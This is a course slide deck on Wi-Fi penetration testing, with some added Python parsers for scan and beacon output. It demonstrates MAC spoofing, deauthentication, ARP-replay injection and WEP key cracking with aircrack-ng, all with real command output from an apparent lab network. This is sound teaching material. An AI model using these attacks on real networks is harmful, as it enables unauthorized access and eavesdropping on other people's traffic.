Wireless Network Penetration Testing
Nelson Murilo
Clavis Segurança da Informação
$ whoami
• Infosec consultant
• 2 published books
• Pentester
• Forensic investigator
• Incident handler
• Instructor and speaker
Contacts
nmurilo@gmail.com
nelson.murilo
@nelsonmurilo
Course model
• Live (online) classes
• Recorded classes for review
• Test environments
• Complementary material
• Assessment
Agenda
• Introduction
• Wi-Fi network concepts
• Main vulnerabilities
• Current tools
• Probing and mapping
• Environment identification
• Attacks
• Wrapping up
Introduction
• Concepts
• Characteristics
§ Wi-Fi
§ Bluetooth
§ Infrared
§ WiMax
§ RFID
§ Cellular (GSM/TDMA/CDMA, etc.)
§ ZigBee (802.15.4)
§ UWB (802.15.3)
Wireless networks
IEEE 802.11
Current standards:
802.11b 11 Mb 2.4 GHz
802.11a 54 Mb 5.1 GHz
802.11g 54 Mb 2.4 GHz
802.11i - security mechanisms
802.1x - authentication mechanisms, used on wired and wireless networks
802.11n - increased speed, 108 Mb nominal.
# dmesg | grep phy
[ 0.000000] BIOS-provided physical RAM map:
[ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 84.913969] Registered led device: rt2800usb-phy0::radio
[ 84.913999] Registered led device: rt2800usb-phy0::assoc
[ 84.914026] Registered led device: rt2800usb-phy0::quality
# iwconfig
lo no wireless extensions.
wlan4 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
eth4 no wireless extensions.
Channels
$ iwlist wlan0 freq
wlan0     24 channels in total; available frequencies :
          Channel 01 : 2.412 GHz
          Channel 02 : 2.417 GHz
          Channel 03 : 2.422 GHz
          Channel 04 : 2.427 GHz
          Channel 05 : 2.432 GHz
          Channel 06 : 2.437 GHz
          Channel 07 : 2.442 GHz
          Channel 08 : 2.447 GHz
          Channel 09 : 2.452 GHz
          Channel 10 : 2.457 GHz
          Channel 11 : 2.462 GHz
          Channel 36 : 5.18 GHz
          Channel 40 : 5.2 GHz
          Channel 44 : 5.22 GHz
          Channel 48 : 5.24 GHz
          Channel 52 : 5.26 GHz
          Channel 56 : 5.28 GHz
          Channel 60 : 5.3 GHz
          Channel 64 : 5.32 GHz
          Channel 149 : 5.745 GHz
          Channel 153 : 5.765 GHz
          Channel 157 : 5.785 GHz
          Channel 161 : 5.805 GHz
          Channel 165 : 5.825 GHz
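The channel list above is what the card's regulatory domain allows, and the same numbers reappear later as "CH: 11" in beacons and "2462 MHz" in radiotap headers. The following Python is an added example, not from the slides: it parses `iwlist freq` output (a constructed subset of the listing above), computes the expected centre frequency from the 802.11 channel-numbering formula, and flags any channel whose reported frequency disagrees, plus the inverse lookup from MHz back to channel number.

```python
"""Parse `iwlist <iface> freq` output and cross-check each reported channel
against the 802.11 channel-numbering formula. Added example, not from the
original slides; the sample output below is constructed in the iwlist format."""
import re

# Constructed sample: a subset of the 24-channel listing the slide shows.
SAMPLE_IWLIST_FREQ = """\
wlan0     24 channels in total; available frequencies :
          Channel 01 : 2.412 GHz
          Channel 06 : 2.437 GHz
          Channel 11 : 2.462 GHz
          Channel 36 : 5.18 GHz
          Channel 165 : 5.825 GHz
"""

_CHANNEL_RE = re.compile(r"Channel\s+(\d+)\s*:\s*([\d.]+)\s*GHz")


def channel_to_mhz(channel: int) -> int:
    """Centre frequency (MHz) of an 802.11 channel number.

    2.4 GHz band: 2407 + 5 * ch for channels 1-13; channel 14 sits at 2484.
    5 GHz band:   5000 + 5 * ch, which covers 36-64 and 149-165 in the listing.
    """
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    if channel == 14:
        return 2484
    if 36 <= channel <= 177:
        return 5000 + 5 * channel
    raise ValueError(f"channel {channel} is not a 2.4 GHz or 5 GHz 802.11 channel")


def parse_iwlist_freq(text: str) -> dict:
    """Return {channel: MHz} for every 'Channel NN : X.XXX GHz' line."""
    return {int(ch): round(float(ghz) * 1000) for ch, ghz in _CHANNEL_RE.findall(text)}


def channel_mismatches(text: str) -> list:
    """Channels whose reported frequency disagrees with the formula (empty = consistent)."""
    return [ch for ch, mhz in parse_iwlist_freq(text).items() if channel_to_mhz(ch) != mhz]


def frequency_to_channel(mhz: int) -> int:
    """Inverse lookup, e.g. to map '2462 MHz' in a radiotap header back to channel 11."""
    for ch in list(range(1, 15)) + list(range(36, 178)):
        if channel_to_mhz(ch) == mhz:
            return ch
    raise ValueError(f"{mhz} MHz is not a 2.4 GHz or 5 GHz channel centre")


if __name__ == "__main__":
    print(parse_iwlist_freq(SAMPLE_IWLIST_FREQ))
    print("mismatches:", channel_mismatches(SAMPLE_IWLIST_FREQ))
```

Running it on the real `iwlist wlan0 freq` output of a card is a quick sanity check that the driver's channel table is the one the regulatory domain should expose before any monitor-mode capture is trusted.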
Ad-Hoc
Infrastructure
[figure: access point broadcasting "((( network name )))"]
Network name disclosure
# iwlist wlan0 scan | egrep "Address|ESSID"
[...]
          Cell 05 - Address: 7C:4F:B5:E4:CC:80
                    ESSID:"GVT-CC81"
          Cell 06 - Address: 00:07:40:4D:1A:5C
                    ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00"
          Cell 07 - Address: 6C:2E:85:F3:0C:8B
                    ESSID:"GVT-0C87"
23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown) Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]
00:07:40:4D:1A:5C (the AP whose ESSID showed as \x00 bytes in the scan above answers the client's directed Probe Request with its real name)
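Seen from the defender's side, the sequence above (beacon without a name, a client probing for the network by name, the AP answering with that name) is easy to detect in the same tcpdump output. The following Python is an added example, not from the slides: it parses constructed lines in the tcpdump format shown and reports which hidden networks have been revealed by their own probe responses and which clients are broadcasting the names of networks they already know.

```python
"""Spot SSID disclosure in tcpdump 802.11 output: beacons with an empty name
(hidden SSID), probe requests in which a client names the network it is looking
for, and probe responses in which the AP answers with the name it hides from
beacons. Added example, not from the original slides; the sample lines are
constructed in the tcpdump format shown above."""
import re
from collections import defaultdict

# Constructed sample lines (same shapes as the slide's tcpdump output).
SAMPLE_LINES = """\
23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 Mbit][|802.11]
09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown) Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]
14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:ff:ff:ff:ff:ff:ff SA:00:07:40:4d:1a:5c (oui Unknown) Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
""".splitlines()

_FRAME_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+)"
    r"(?:.*?BSSID:(?P<bssid>[0-9a-f:]{17}))?"      # only present when tcpdump prints addresses
    r"(?:.*?\bSA:(?P<sa>[0-9a-f:]{17}))?"
    r".*?(?P<kind>Beacon|Probe Request|Probe Response) \((?P<ssid>[^)]*)\)",
    re.IGNORECASE,
)


def is_hidden(ssid: str) -> bool:
    """Empty, or nothing but NUL escapes (the \\x00\\x00... form iwlist prints)."""
    return ssid.replace("\\x00", "").strip() == ""


def parse_frames(lines):
    """Yield one dict per management frame that carries a network-name field."""
    for line in lines:
        m = _FRAME_RE.search(line)
        if m:
            yield {"ts": m["ts"], "kind": m["kind"].title(), "ssid": m["ssid"],
                   "bssid": m["bssid"], "sa": m["sa"]}


def ssid_disclosure_report(lines) -> dict:
    """Summarise what the capture reveals about network names."""
    hidden_bssids = set()                # APs that beacon without a name
    unattributed_hidden = 0              # hidden beacons printed without addresses
    revealed = {}                        # AP MAC -> name it gave in a probe response
    probing = defaultdict(set)           # client MAC -> names it asked for
    for f in parse_frames(lines):
        if f["kind"] == "Beacon" and is_hidden(f["ssid"]):
            if f["bssid"] is None:
                unattributed_hidden += 1
            else:
                hidden_bssids.add(f["bssid"].lower())
        elif f["kind"] == "Probe Request" and f["sa"] and not is_hidden(f["ssid"]):
            probing[f["sa"].lower()].add(f["ssid"])
        elif f["kind"] == "Probe Response" and f["sa"]:
            revealed[f["sa"].lower()] = f["ssid"]
    return {
        "hidden_bssids": hidden_bssids,
        "unattributed_hidden_beacons": unattributed_hidden,
        "revealed": revealed,
        "probing_clients": dict(probing),
        # the point of the slide: hiding the name buys nothing once a client probes for it
        "hidden_but_revealed": {b: n for b, n in revealed.items() if b in hidden_bssids},
    }


if __name__ == "__main__":
    for key, value in ssid_disclosure_report(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Pipe `tcpdump -e -i mon0` output into it (the `-e` flag is what makes tcpdump print the BSSID/SA fields the regex keys on) to see, per AP, whether a "hidden" name has already leaked, and, per client, which network names that client volunteers wherever it goes.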
WEP
WPA
WPA-PSK (Pre-shared Key)
WPA-Enterprise
RADIUS
[figure: WPA-Enterprise authentication backends behind RADIUS: /etc/password, /etc/raddb/users, Oracle/MySQL/etc., digital certificate, biometrics]
Initial concepts
$ /sbin/ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:21:29:65:b8:45
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
# tcpdump -vv -c 3 -i wlan0
tcpdump: listening on wlan0, link-type EN10MB (Ethernet), capture size 65535 bytes
14:00:37.291962 IP (tos 0x0, hl 64, id 0, offset 0, flags [DF], proto ICMP (1), length 84)
    192.168.11.2 > air: ICMP echo request, id 30507, seq 9, length 64
14:00:37.292417 IP (tos 0x0, hl 64, id 8024, offset 0, flags [DF], proto UDP (17), length 71)
    192.168.11.2.49351 > air: [udp sum ok] 2302+ PTR? 1.11.168.192.in-addr.arpa. (43)
14:00:37.294831 IP (tos 0x0, hl 255, id 49706, offset 0, flags [none], proto ICMP (1), length 84)
    air > 192.168.11.2: ICMP echo reply, id 30507, seq 9, length 64
3 packets captured
Promiscuous mode
# iwconfig wlan0
wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on
# iw wlan0 info
Interface wlan0
        ifindex 32
        type managed
Monitor mode
# iw dev wlan0 interface add mon0 type monitor
# iwconfig wlan0 mode monitor
# iwconfig mon0
mon0      IEEE 802.11bg  Mode:Monitor  Tx-Power=20 dBm
          Retry long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
# iw mon0 info
Interface mon0
        ifindex 35
        type monitor
# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header), capture size 65535 bytes
14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us
Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1,
PRIVACY[|802.11]
14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP
Encrypted 0us Data IV:5b5 Pad 20 KeyID 2
14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP
Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured
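The difference between the two captures is the link type: in promiscuous mode tcpdump sees Ethernet frames (EN10MB), in monitor mode it sees the raw 802.11 frame behind a radiotap header (IEEE802_11_RADIO), which is where the beacon's SSID, rates, channel and PRIVACY flag live. The following Python is an added example, not from the slides: it builds a beacon frame from constructed bytes (radiotap header, 802.11 management header, fixed fields, information elements) and parses it back into exactly the fields tcpdump prints as `Beacon (SSID) [rates] ESS CH: n, PRIVACY`. The BSSID and SSID values reuse the ones shown on the slides only as sample data.

```python
"""What monitor mode exposes that promiscuous mode does not: the 802.11
management frame itself. This builds a beacon the way an AP would (radiotap
header + 802.11 header + fixed fields + information elements) and parses it
back into the fields tcpdump prints as 'Beacon (SSID) [rates] ESS CH: n, PRIVACY'.
Added example, not from the original slides; the frame bytes are constructed."""
import struct

# Radiotap header with no optional fields: version 0, pad, length 8, present bitmap 0.
RADIOTAP_MINIMAL = struct.pack("<BBHI", 0, 0, 8, 0)
BROADCAST = b"\xff" * 6
CAP_ESS = 0x0001       # capability bit 0: infrastructure BSS
CAP_PRIVACY = 0x0010   # capability bit 4: WEP/WPA in use ("PRIVACY" in tcpdump)


def build_beacon(bssid: bytes, ssid: bytes, channel: int, privacy: bool,
                 rates=(0x82, 0x84, 0x8B, 0x96)) -> bytes:
    """Constructed beacon: rates are in 500 kbit/s units, high bit = basic rate."""
    frame_control = 0x0080                       # type 0 (management), subtype 8 (beacon)
    header = struct.pack("<HH", frame_control, 0) + BROADCAST + bssid + bssid + struct.pack("<H", 0)
    capability = CAP_ESS | (CAP_PRIVACY if privacy else 0)
    fixed = struct.pack("<QHH", 0, 100, capability)   # timestamp, interval 100 TU, capabilities
    ies = (bytes([0, len(ssid)]) + ssid                # IE 0: SSID (empty = hidden)
           + bytes([1, len(rates)]) + bytes(rates)     # IE 1: supported rates
           + bytes([3, 1, channel]))                   # IE 3: DS parameter set (channel)
    return RADIOTAP_MINIMAL + header + fixed + ies


def parse_ies(buf: bytes, offset: int) -> dict:
    """Information elements are TLVs: 1-byte id, 1-byte length, value."""
    ies = {}
    while offset + 2 <= len(buf):
        eid, length = buf[offset], buf[offset + 1]
        ies[eid] = buf[offset + 2: offset + 2 + length]
        offset += 2 + length
    return ies


def parse_beacon(buf: bytes) -> dict:
    """Strip radiotap, check the frame type, and decode the beacon body."""
    version, _pad, rt_len, _present = struct.unpack_from("<BBHI", buf, 0)
    if version != 0:
        raise ValueError("unsupported radiotap version")
    frame_control = struct.unpack_from("<H", buf, rt_len)[0]
    ftype, subtype = (frame_control >> 2) & 0x3, (frame_control >> 4) & 0xF
    if (ftype, subtype) != (0, 8):
        raise ValueError("not a beacon frame")
    bssid = buf[rt_len + 16: rt_len + 22]                # address 3 of the management header
    body = rt_len + 24                                   # 24-byte 802.11 header
    _timestamp, interval, capability = struct.unpack_from("<QHH", buf, body)
    ies = parse_ies(buf, body + 12)
    rates = ies.get(1, b"")
    ssid = ies.get(0, b"")
    return {
        "bssid": ":".join(f"{b:02x}" for b in bssid),
        "ssid": ssid.decode("utf-8", "replace"),
        "hidden": ssid.strip(b"\x00") == b"",
        "channel": ies[3][0] if 3 in ies else None,
        "interval_tu": interval,
        "ess": bool(capability & CAP_ESS),
        "privacy": bool(capability & CAP_PRIVACY),
        "rates_mbit": [(r & 0x7F) / 2 for r in rates],
        "basic_rates_mbit": [(r & 0x7F) / 2 for r in rates if r & 0x80],
    }


def describe(buf: bytes) -> str:
    """Render the parsed beacon in tcpdump's one-line style."""
    b = parse_beacon(buf)
    rates = " ".join(f"{r:.1f}{'*' if r in b['basic_rates_mbit'] else ''}" for r in b["rates_mbit"])
    out = f"Beacon ({b['ssid']}) [{rates} Mbit] {'ESS' if b['ess'] else 'IBSS'} CH: {b['channel']}"
    return out + (", PRIVACY" if b["privacy"] else "")


SAMPLE_BEACON = build_beacon(bytes.fromhex("0007404d1a5c"), b"LABVIRUS", 11, privacy=True)
SAMPLE_HIDDEN = build_beacon(bytes.fromhex("0007404d1a5c"), b"", 11, privacy=True)

if __name__ == "__main__":
    print(describe(SAMPLE_BEACON))
    print(describe(SAMPLE_HIDDEN))
```

None of these fields exist in an EN10MB capture: the driver has already stripped the 802.11 header and the management frames never reach the IP stack, which is why the earlier `tcpdump -i wlan0` showed only ICMP and DNS.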
Channel selection
# iwconfig mon0 channel 11
# iwconfig mon0
mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=20 dBm
          Retry long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 65535 bytes
14:49:58.832316 1.0 Mb/s 2462 MHz 11b -62dB signal antenna 1 [bit 14] 0us Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]
14:49:58.847041 1.0 Mb/s 2462 MHz 11b -78dB signal antenna 1 [bit 14] 0us Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[|802.11]
14:49:58.866671 1.0 Mb/s 2462 MHz 11b -80dB signal antenna 1 [bit 14] 0us Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[|802.11]
3 packets captured
AP identification
CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca
BSSID STATION PWR Rate Lost Frames Probe
00:25:9C:36:A0:9F 00:0E:2E:EC:6B:05 -1 11 - 0 0 1
00:25:9C:36:A0:9F 00:0E:2E:45:F5:B3 -1 11 - 0 0 1
grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt
00-25-9C (hex) Cisco-Linksys, LLC
Traffic analysis
tshark -r Kismet-20120309-04-23-25-1.pcapdump
6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1
9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache flush PTR
iwconfig wlan5
wlan5 IEEE 802.11abgn ESSID:"bsbca"
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
iwconfig wlan5 essid bsbca
MAC filtering
OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01
Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01
FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01
Mac OS X
# ifconfig en0 ether 00:00:00:00:00:01
Wired Equivalent Privacy
• Fragile protocol
• Cracking requires capturing a large number of packets (5,000+)
• Or by dictionary
• Several tools available
CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS
/usr/local/etc/kismet.conf
logtypes=pcapdump,gpsxml,netxml,nettxt,alert
gps=true
preferredchannels=1,6,11
allowplugins=true
$ ls -lh Kismet*
-rw-r--r-- 1 root root 8.0M 2012-02-20 14:04 Kismet-20120220-13-47-37-1.pcapdump
http://blog.kismetwireless.net/
Suite made up of several programs
• Traffic analysis
• WEP key cracking (several types of attacks)
• Packet injection
• WPA(2)-PSK key cracking using a dictionary
• Rogue access point creation
Common sequence
• Airmon-ng: puts the interface in monitor mode
• Airodump-ng: packet viewing and capture
• Aircrack-ng: WEP key cracking
# airmon-ng
Interface Chipset Driver
wlan5 Ralink RT2870/3070 rt2800usb - [phy48]
# airmon-ng start wlan5
Interface Chipset Driver
wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airmon-ng start wlan5 11
Interface Chipset Driver
wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
Airodump-ng
# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
# airodump-ng mon0
CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -41 1091 55109 0 0 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 - 1 3 9 LABVIRUS
Aircrack-ng
$ aircrack-ng labvirus-01.pcap
[00:00:05] Tested 633 keys (got 46103 IVs)
KB depth byte(vote)
0 2/ 4 14(55552) 13(54528) 3C(53504) 98(53504) 24(53248)
1 2/ 1 DE(54784) 92(54528) 06(52992) 7D(52736) 02(52480)
2 1/ 3 82(56576) 18(54272) 45(53760) CD(53504) FC(53248)
3 1/ 3 09(57600) 08(55808) 41(55040) C9(54016) 8E(52992)
4 51/ 4 A1(48640) 83(48384) 86(48384) 99(48384) B2(48384)
KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: naoxxxxxxxx )
Decrypted correctly: 100%
Aireplay-ng
# aireplay-ng --test mon0
17:33:50 Trying broadcast probe requests...
17:33:50 Injection is working!
17:33:52 Found 1 AP
17:33:52 Trying directed probe requests...
17:33:52 00:25:9C:36:0A:EF - channel: 11 - 'LABVIRUS'
17:33:52 Ping (min/avg/max): 1.671ms/6.230ms/11.234ms Power: -28.73
17:33:52 30/30: 100%
# aireplay-ng --arpreplay -h mac_cliente -e ESSID interface
# arp -an
#
# ping -c 1 192.168.11.1
PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=255 time=54.9 ms
--- 192.168.11.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 54.973/54.973/54.973/0.000 ms
# arp -an
(192.168.11.1) at 00:07:40:35:a1:18 [ether] on wlan0
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS
aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
The interface MAC (00:26:5A:74:15:28) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:21:29:65:B8:45
17:44:10 Waiting for beacon frame (ESSID: LABVIRUS) on channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
CH 11 ][ Elapsed: 48 s ][ 2012-02-21 17:44 ][ Decloak: 00:07:40:4D:1A:5C
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -38 100 353 14438 652 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS
# airmon-ng start wlan5 11
Interface Chipset Driver
wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airodump-ng -c 11 mon0
• Wait for a new connection
• Force a disconnection
aireplay-ng --deauth 100 -h MAC_CLIENTE -e ESSID mon0
ivstools-ng
Aircrack-ng 1.1 r2076
[00:00:02] Tested 132441 keys (got 2448 IVs)
KB depth byte(vote)
0 19/ 34 F7(3840) 05(3584) 1A(3584) 2B(3584) 32(3584)
1 43/ 1 E7(3328) 01(3072) 02(3072) 04(3072) 0B(3072)
2 42/ 2 BB(3328) 15(3072) 21(3072) 28(3072) 34(3072)
3 0/ 7 CB(5888) A7(4352) 0B(4096) 5E(4096) 93(4096)
4 8/ 47 FF(4096) 1B(3840) 2E(3840) 44(3840) 83(3840)
Failed. Next try with 5000 IVs.
Aircrack-ng 1.1 r2076
[00:00:03] Tested 163521 keys (got 7120 IVs)
KB depth byte(vote)
0 4/ 7 FE(9984) 18(9728) 29(9728) 7F(9728) B4(9728) F6(9728)
1 23/ 24 B5(8960) 27(8704) 37(8704) 4A(8704) 51(8704) 53(8704)
2 44/ 2 FA(8448) 00(8192) 26(8192) 2B(8192) 3D(8192) 4C(8192)
3 19/ 3 93(9216) 0B(8960) 11(8960) 12(8960) 1D(8960) 3F(8960)
4 19/ 20 BE(8960) 0A(8704) 11(8704) 12(8704) 3E(8704) 52(8704)
Failed. Next try with 10000 IVs.
for i in poucosivs-0*; do ivstools --convert $i $i.ivs ; done
Opening poucosivs-01.cap
Creating poucosivs-01.cap.ivs
Read 18995 packets.
Written 2448 IVs.
Opening poucosivs-03.cap
Creating poucosivs-03.cap.ivs
Read 551433 packets.
Written 30547 IVs.
Opening poucosivs-04.cap
Creating poucosivs-04.cap.ivs
Read 129917 packets.
Written 13092 IVs.
ivstools --merge *.ivs poucostotal.ivs
Creating poucostotal.ivs
Opening poucosivs-01.cap.ivs
334818 bytes written
Opening poucosivs-03.cap.ivs
4524402 bytes written
Opening poucosivs-04.cap.ivs
6319236 bytes written
# aircrack-ng poucosivs-01.cap poucosivs-02.cap poucosivs-03.cap poucosivs-04.cap
Opening poucosivs-01.cap
Opening poucosivs-02.cap
Opening poucosivs-03.cap
Opening poucosivs-04.cap
Read 689344 packets.
# BSSID ESSID Encryption
1 00:07:40:4D:1A:5C LABVIRUS WEP (40296 IVs)
# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
Total number of packets read 298278
Total number of WEP data packets 162412
Total number of WPA data packets 0
Number of plaintext data packets 0
Number of decrypted WEP packets 108781
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
16:24:43.166932 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
